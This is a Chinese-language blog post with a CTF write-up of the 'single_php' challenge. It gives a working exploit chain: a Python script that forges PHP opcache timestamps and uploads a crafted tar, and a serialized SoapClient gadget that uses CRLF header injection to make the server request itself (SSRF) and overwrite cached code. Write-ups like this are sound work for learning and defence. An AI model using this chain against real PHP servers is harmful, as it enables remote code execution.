<!DOCTYPE html>
<html lang="en">
<style>
    p{
        margin-top: 0 !important;
        margin-bottom: 1rem !important;
        font-size: 1.1rem;
    }
    figure{
        margin: 0 !important;
    }
    pre{
        padding: 0 !important;
        margin-top: 0 !important;
        margin-bottom: 1rem !important;
    }

    td{
        padding: 0 !important;
        margin-bottom: 1rem !important;
    }
    h1,h2,h3,h4,h5,h6{
        margin-top: 0 !important;
        margin-bottom: 1rem !important;
    }
</style>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Zer0 - 0psu3十一月挑战赛｜越艰巨·越狂热]single_php复现</title>
    <link rel="stylesheet" href="/css/styles.css">
    <link rel="stylesheet" href="/css/tailwind.css">
    <link rel="stylesheet" href="/css/highlight.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs/themes/prism-tomorrow.min.css">


<header class="bg-black text-hacker-white py-4 font-dos font-extrabold">
    <div class="container mx-auto flex items-center justify-between space-x-8">
    
      <h1 class="text-2xl font-bold ml-[100px] md:ml-0 animate-pulse text-hacker-color1 md:mr-[20%]">
        <a href="/" class="hover:text-white transition-colors select-none">
          Zer0
        </a>
      </h1>
  
    <!-- 大屏幕 -->
      <nav class="hidden md:block">
        <ul class="flex space-x-6">
          
            <li>
              <a href="/" class="select-none text-lg hover:text-hacker-color1 transition-all hover:underline decoration-wavy duration-300 text-hacker-color3">
                Home
              </a>
            </li>
          
            <li>
              <a href="/archives" class="select-none text-lg hover:text-hacker-color1 transition-all hover:underline decoration-wavy duration-300 text-hacker-color3">
                Archives
              </a>
            </li>
          
            <li>
              <a href="/about" class="select-none text-lg hover:text-hacker-color1 transition-all hover:underline decoration-wavy duration-300 text-hacker-color3">
                About
              </a>
            </li>
          
            <li>
              <a href="/link" class="select-none text-lg hover:text-hacker-color1 transition-all hover:underline decoration-wavy duration-300 text-hacker-color3">
                Friends
              </a>
            </li>
          
        </ul>
      </nav>
  
      <!-- 小屏幕 -->
      <button id="menu-toggle" class="block md:hidden text-white focus:outline-none">
        <svg class="w-6 h-6" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
          <path stroke-linecap="round" stroke-linejoin="round" d="M4 6h16M4 12h16M4 18h16"></path>
        </svg>
      </button>
    </div>
  
    <!-- 折叠菜单 -->
    <nav id="mobile-menu" class="hidden bg-black">
      <ul class="space-y-2 py-4 px-6">
        
          <li>
            <a href="/" class="block text-white hover:text-hacker-color1 transition-colors">
              Home
            </a>
          </li>
        
          <li>
            <a href="/archives" class="block text-white hover:text-hacker-color1 transition-colors">
              Archives
            </a>
          </li>
        
          <li>
            <a href="/about" class="block text-white hover:text-hacker-color1 transition-colors">
              About
            </a>
          </li>
        
          <li>
            <a href="/link" class="block text-white hover:text-hacker-color1 transition-colors">
              Friends
            </a>
          </li>
        
      </ul>
    </nav>
  
    <!-- RSS Link -->
    <link rel="alternate" type="application/rss+xml" title=" RSS" href="/rss.xml" />
  </header>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lunr.js/2.3.9/lunr.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="/js/search.js"></script>
  <script>
        document.addEventListener("DOMContentLoaded", () => {
    const menuToggle = document.getElementById("menu-toggle");
    const mobileMenu = document.getElementById("mobile-menu");

    menuToggle.addEventListener("click", () => {
        if (mobileMenu.classList.contains("hidden")) {
        mobileMenu.classList.remove("hidden");
        } else {
        mobileMenu.classList.add("hidden");
        }
    });
    });

  </script>
  

<meta name="generator" content="Hexo 7.2.0"></head>
<body class="bg-black text-hacker-color3 container mx-auto">
    <!-- 文章标题 -->
    <h1 class="text-5xl text-hacker-color1 font-bold font-dos my-6 text-center">0psu3十一月挑战赛｜越艰巨·越狂热]single_php复现</h1>

    <!-- 发布时间 -->
    <p class="text-hacker-color3 text-center text-sm mb-4">
        2025-01-20
    </p>

    <!-- 文章内容 -->
    <div id="article-content" class="article-entry prose prose-invert mx-auto max-w-4xl leading-relaxed highlight">
        <h2 id="DASCTF-X-0psu3十一月挑战赛｜越艰巨·越狂热-single-php复现"><a href="#DASCTF-X-0psu3十一月挑战赛｜越艰巨·越狂热-single-php复现" class="headerlink" title="[DASCTF X 0psu3十一月挑战赛｜越艰巨·越狂热]single_php复现"></a>[DASCTF X 0psu3十一月挑战赛｜越艰巨·越狂热]single_php复现</h2><p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101718813.png" alt="image-20250110171833140"></p>
<p>进题如上</p>
<p>传参highlight_file,拿到源码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">&lt;!DOCTYPE html&gt;<br> &lt;html&gt;<br> &lt;head&gt;<br> &lt;style&gt;<br> img &#123;<br> max-width: 200px;<br> max-height: 200px;<br> &#125;<br> &lt;/style&gt;<br> &lt;title&gt;revenge to siranai.php<br> <br> <br> &lt;/title&gt;<br> <br> &lt;/head&gt;<br> &lt;body&gt;<br> <br> &lt;h5&gt;<br> This is my wife.She is from Imagination.<br> And I,use her name as my id.<br> &lt;/h5&gt;<br> &lt;img src=&quot;mywife.png&quot; alt=&quot;this is my wife&quot;&gt;<br> &lt;p&gt;I have been single dog for 19 years.&lt;br&gt;<br> One day, my brothers betrayed the singles organization.&lt;br&gt;<br> S* and B* ,both of them have the kanozyo.&lt;br&gt;<br> Now revenge to them!!!!!&lt;br&gt;<br> use &#x27;$_GET[&#x27;LuckyE&#x27;](__FILE__);&#x27; to begin your revenge!!&lt;br&gt;<br> &lt;/p&gt;<br> &lt;/body&gt;<br> &lt;/html&gt;<br> &lt;?php<br> error_reporting(0);<br> class siroha&#123;<br> public $koi;<br> <br> public function __destruct()&#123;<br> $this-&gt;koi[&#x27;zhanjiangdiyishenqing&#x27;]();<br> &#125;<br> &#125;<br> $kanozyo = $_GET[&#x27;LuckyE&#x27;](__FILE__);<br> var_dump($kanozyo);<br> $suki = unserialize($_POST[&#x27;suki&#x27;]); <br></code></pre></td></tr></table></figure>

<p>得到提示，revenge to siranai.php</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101722996.png" alt="image-20250110172256406"></p>
<p>emm，看起来得打<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1878220">Soap</a>反序列化</p>
<p>回到原先的反序列化的页面</p>
<p>搞一个phpinfo看看</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101729720.png" alt="image-20250110172906287"></p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101738478.png" alt="image-20250110173851522"></p>
<p>这个缓存是放在了&#x2F;tmp目录下并有时间戳验证，可以先了解<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/223?time__1311=eqIx0DyGG=emqAKqGNSDrDRmhiRRou2bD">opcache执行php代码</a></p>
<p>那整体的思路应该就是上传我们的恶意压缩包，对原本的缓存文件进行覆盖，变成我们的恶意文件</p>
<p>本地拉取相同版本php的镜像，用脚本进行伪造时间戳</p>
<p>本人代码能力有限，直接使用官方WP的代码</p>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> binascii<br><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">import</span> tarfile<br><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-keyword">import</span> os<br>url = <span class="hljs-string">&quot;http://97ed25bf-fecf-4710-bd78-9e313a784c29.node5.buuoj.cn:81/?LuckyE=filectime&quot;</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">timec</span>():<br>    pattern = <span class="hljs-string">r&quot;\d&#123;10&#125;&quot;</span>  <span class="hljs-comment">#匹配十位数字</span><br>    timeres = requests.get(url=url)<br>    <span class="hljs-keyword">match</span> = re.search(<span class="hljs-string">r&quot;int\((\d&#123;10&#125;)\)&quot;</span>,timeres.text)<span class="hljs-comment">#从响应包中提取到时间戳信息</span><br>    <span class="hljs-keyword">try</span>:<br>        ten_digit_number = <span class="hljs-keyword">match</span>.group(<span class="hljs-number">1</span>)<br>        <span class="hljs-built_in">print</span>(ten_digit_number)<br>        <span class="hljs-keyword">return</span> ten_digit_number  <span class="hljs-comment">#返回时间戳</span><br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;dame&#x27;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">split_string_into_pairs</span>(<span class="hljs-params">input_string</span>):<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(input_string) % <span class="hljs-number">2</span> != <span class="hljs-number">0</span>:<br>        <span class="hljs-keyword">raise</span> ValueError(<span class="hljs-string">&quot;输入字符串的长度必须是偶数&quot;</span>)<br>    pairs = [input_string[i:i+<span class="hljs-number">2</span>] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(input_string), <span class="hljs-number">2</span>)]<br>    <span class="hljs-keyword">return</span> pairs<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">totime</span>(<span class="hljs-params">time</span>):<br>    b = split_string_into_pairs(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(<span class="hljs-built_in">int</span>(time))&#125;</span>&quot;</span>)<br>    b.pop(<span class="hljs-number">0</span>)<br>    s = <span class="hljs-string">&#x27;&#x27;</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(b)):<br>        s += b[-<span class="hljs-number">1</span>]<br>        b.pop(-<span class="hljs-number">1</span>)<br>    <span class="hljs-keyword">return</span> s<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">changetime</span>():<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;index.php.bin&quot;</span>,<span class="hljs-string">&quot;rb&quot;</span>) <span class="hljs-keyword">as</span> file:<br>        binary_data = file.read()<br>        <span class="hljs-comment"># 将二进制数据转换为十六进制字符串</span><br>        hex_data = binascii.hexlify(binary_data).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>        new_data = hex_data[<span class="hljs-number">0</span>:<span class="hljs-number">128</span>]+totime(timec())+hex_data[<span class="hljs-number">136</span>:]<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;index.php.bin&quot;</span>,<span class="hljs-string">&quot;wb&quot;</span>) <span class="hljs-keyword">as</span> f:<br>            f.write(<span class="hljs-built_in">bytes</span>.fromhex(new_data))<br>changetime()<br>sys_id = hashlib.md5(<span class="hljs-string">&quot;8.2.10API420220829,NTSBIN_4888(size_t)8\002&quot;</span>.encode(<span class="hljs-string">&quot;utf-8&quot;</span>)).hexdigest()<br><span class="hljs-built_in">print</span>(sys_id)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">tar_file</span>():<br>    tar_filename = <span class="hljs-string">&#x27;exp.tar&#x27;</span><br>    <span class="hljs-keyword">with</span> tarfile.<span class="hljs-built_in">open</span>(tar_filename,<span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> tar:<br>        directory_info = tarfile.TarInfo(name=<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;sys_id&#125;</span>/var/www/html&#x27;</span>)<br>        directory_info.<span class="hljs-built_in">type</span> = tarfile.DIRTYPE<br>        directory_info.mode = <span class="hljs-number">0o777</span><br>        tar.addfile(directory_info)<br>        tar.add(<span class="hljs-string">&#x27;index.php.bin&#x27;</span>, arcname=<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;sys_id&#125;</span>/var/www/html/index.php.bin&#x27;</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>():<br>    file = &#123;<span class="hljs-string">&quot;file&quot;</span>:(<span class="hljs-string">&quot;exp.tar&quot;</span>,<span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;exp.tar&quot;</span>,<span class="hljs-string">&quot;rb&quot;</span>).read(),<span class="hljs-string">&quot;application/x-tar&quot;</span>)&#125;<br>    res  = requests.post(url=<span class="hljs-string">&quot;http://97ed25bf-fecf-4710-bd78-9e313a784c29.node5.buuoj.cn:81/siranai.php&quot;</span>,files=file)<br>    <span class="hljs-built_in">print</span>(res.request.headers)<br>    <span class="hljs-keyword">return</span> res.request<br>tar_file()<br>request_content = upload()<br>upload_body = <span class="hljs-built_in">str</span>(request_content.body).replace(<span class="hljs-string">&quot;\&quot;&quot;</span>,<span class="hljs-string">&quot;\\\&quot;&quot;</span>)<br>content_length = request_content.headers[<span class="hljs-string">&#x27;Content-Length&#x27;</span>]<br><span class="hljs-built_in">print</span>(content_length)<br><span class="hljs-built_in">print</span>(upload_body)<br></code></pre></td></tr></table></figure>

<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101747887.png" alt="image-20250110174712860"></p>
<p>封装到Soap</p>
<figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">siroha</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$koi</span>;<br><br><br>&#125;<br><br><span class="hljs-variable">$postdata</span> = <span class="hljs-string">&quot;&quot;</span>;<br><span class="hljs-keyword">try</span> &#123;<br>    <span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SoapClient</span>(<span class="hljs-literal">null</span>, <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;location&#x27;</span> =&gt; <span class="hljs-string">&quot;http://127.0.0.1/siranai.php&quot;</span>, <span class="hljs-string">&#x27;user_agent&#x27;</span> =&gt; <span class="hljs-string">&quot;Enterpr1se\r\n&quot;</span> . <span class="hljs-string">&quot;Cookie: PHPSESSION=16aaab9fb\r\nContent-Type: multipart/form-data; boundary=&quot;</span> . <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$postdata</span>, <span class="hljs-number">2</span>, <span class="hljs-number">32</span>) . <span class="hljs-string">&quot;\r\nConnection: keep-alive\r\nAccept: */*\r\nContent-Length: 10416&quot;</span> . <span class="hljs-string">&quot;\r\n\r\n&quot;</span> . <span class="hljs-variable">$postdata</span>,<br>        <span class="hljs-string">&#x27;uri&#x27;</span> =&gt; <span class="hljs-string">&quot;http://127.0.0.1/siranai.php&quot;</span>));<br>&#125; <span class="hljs-keyword">catch</span> (SoapFault <span class="hljs-variable">$e</span>) &#123;<br>&#125;<br><span class="hljs-variable">$b</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">siroha</span>();<br><span class="hljs-variable">$b</span>-&gt;koi = [<span class="hljs-string">&quot;zhanjiangdiyishenqing&quot;</span> =&gt; [<span class="hljs-variable">$a</span>, <span class="hljs-string">&quot;nnnnn&quot;</span>]];<br><span class="hljs-comment">//通过数组调用类方法调用一个不存在的方法触发::__call魔术方法</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$b</span>));<br></code></pre></td></tr></table></figure>

<p>BP放包</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101746573.png" alt="image-20250110174642997"></p>
<p>这就已经覆盖成功了，直接传参拿到flag</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202501101750618.png" alt="image-20250110175053635"></p>
<p><del>这题确实不好写，据说当时是零解，我现在写都不好写【大哭】</del></p>

    </div>

    <!-- 返回主页链接 -->
    <div class="text-center my-8">
        <a href="/" class="text-hacker-color1 underline hover:text-hacker-color2">← Back to Home</a>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/prismjs/prism.min.js"></script>
<script>Prism.highlightAll();</script>



<footer class="bg-black text-gray-400 py-4">
    <div class="container mx-auto text-center">
      <p>© <span id="current-year"></span>  Zer0 
        <br> Powered by <a class="hover:text-white duration-150 hover:underline decoration-slice" target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & <a class="hover:text-white duration-150 hover:underline decoration-slice" target="_blank" rel="noopener" href="https://github.com/m310ct/hexo-theme-hexploit">Hexpolit</a></p>
    </div>
  </footer>
  
  <script> 
    document.getElementById("current-year").textContent = new Date().getFullYear();
  </script>
  


</body>
</html>
